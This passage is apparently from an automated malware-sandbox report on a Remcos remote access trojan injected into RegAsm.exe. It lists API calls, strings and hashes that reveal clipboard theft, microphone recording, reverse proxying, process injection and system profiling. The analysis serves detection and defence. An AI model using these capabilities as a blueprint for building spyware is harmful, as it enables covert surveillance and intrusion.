                                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                        • GetLastError.KERNEL32 ref: 00455EB1
                                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                        • __freea.LIBCMT ref: 00454003
                                                        • __freea.LIBCMT ref: 0045400F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                        • String ID: \@E
                                                        • API String ID: 201697637-1814623452
                                                        • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                        • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: \&G$\&G$`&G
                                                        • API String ID: 269201875-253610517
                                                        • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                        • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 65535$udp
                                                        • API String ID: 0-1267037602
                                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                        • __dosmaperr.LIBCMT ref: 0043A937
                                                        • _free.LIBCMT ref: 0043A943
                                                        • _free.LIBCMT ref: 0043A94A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                        • String ID:
                                                        • API String ID: 2441525078-0
                                                        • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                        • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                        • GetMessageA.USER32 ref: 0040556F
                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                        • DispatchMessageA.USER32 ref: 00405589
                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                        • API String ID: 2956720200-749203953
                                                        • Opcode ID: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                        • Opcode Fuzzy Hash: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                        • String ID: 0VG$0VG$<$@$Temp
                                                        • API String ID: 1704390241-2575729100
                                                        • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                        • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenClipboard.USER32 ref: 00416941
                                                        • EmptyClipboard.USER32 ref: 0041694F
                                                        • CloseClipboard.USER32 ref: 00416955
                                                        • OpenClipboard.USER32 ref: 0041695C
                                                        • GetClipboardData.USER32 ref: 0041696C
                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                        • CloseClipboard.USER32 ref: 00416984
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                        • String ID: !D@
                                                        • API String ID: 2172192267-604454484
                                                        • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                        • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                        • String ID:
                                                        • API String ID: 297527592-0
                                                        • Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                        • Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                        • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 00448135
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00448141
                                                        • _free.LIBCMT ref: 0044814C
                                                        • _free.LIBCMT ref: 00448157
                                                        • _free.LIBCMT ref: 00448162
                                                        • _free.LIBCMT ref: 0044816D
                                                        • _free.LIBCMT ref: 00448178
                                                        • _free.LIBCMT ref: 00448183
                                                        • _free.LIBCMT ref: 0044818E
                                                        • _free.LIBCMT ref: 0044819C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Eventinet_ntoa
                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                        • API String ID: 3578746661-3604713145
                                                        • Opcode ID: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
                                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                        • Opcode Fuzzy Hash: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
                                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                        • API String ID: 1462127192-2001430897
                                                        • Opcode ID: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
                                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                        • Opcode Fuzzy Hash: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
                                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentProcess
                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                        • API String ID: 2050909247-4242073005
                                                        • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _strftime.LIBCMT ref: 00401D50
                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                        • API String ID: 3809562944-243156785
                                                        • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                        • int.LIBCPMT ref: 00410E81
                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 3815856325-2015055088
                                                        • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                        • waveInStart.WINMM ref: 00401CFE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                        • String ID: dMG$|MG$PG
                                                        • API String ID: 1356121797-532278878
                                                        • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                                        • DispatchMessageA.USER32 ref: 0041D4F3
                                                        • GetMessageA.USER32 ref: 0041D500
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                        • String ID: Remcos
                                                        • API String ID: 1970332568-165870891
                                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                                        • _free.LIBCMT ref: 00445494
                                                        • _free.LIBCMT ref: 004454AD
                                                        • _free.LIBCMT ref: 004454DF
                                                        • _free.LIBCMT ref: 004454E8
                                                        • _free.LIBCMT ref: 004454F4
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                        • String ID: C
                                                        • API String ID: 1679612858-1037565863
                                                        • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
